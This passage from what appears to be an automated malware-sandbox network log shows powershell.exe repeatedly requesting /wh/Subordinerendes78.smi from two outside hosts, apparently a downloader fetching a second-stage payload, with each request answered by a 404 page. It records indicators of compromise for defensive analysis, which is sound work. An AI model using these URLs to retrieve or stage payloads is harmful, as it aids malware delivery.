                                                                                                    date: Thu, 05 Dec 2024 09:45:34 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:45:35 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:45:35 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.649836184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:40 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:40 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:45:40 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:45:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.649852148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:46 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:46 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:45:46 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:45:46 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:45:46 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.649869184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:52 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:52 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:45:52 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:45:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.649879148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:45:58 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:45:58 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:45:58 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:45:58 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:45:58 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.649894184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:04 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:04 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:46:04 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:46:04 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.649910148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:09 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:10 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:46:10 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:46:10 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:46:10 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.649923184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:15 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:16 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:46:16 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:46:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.649938148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:21 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:22 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:46:21 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:46:22 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:46:22 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.649954184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:27 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:27 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:46:27 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2024-12-05 09:46:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.649966148.251.114.2334432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:33 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.erp-royal-crown.info
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:34 UTC238INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1251
                                                                                                    date: Thu, 05 Dec 2024 09:46:33 GMT
                                                                                                    server: LiteSpeed
                                                                                                    2024-12-05 09:46:34 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                                    2024-12-05 09:46:34 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.649981184.171.244.2314432724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:46:39 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                                                    Host: www.almrwad.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:46:40 UTC164INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:46:40 GMT
                                                                                                    Server: Apache
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
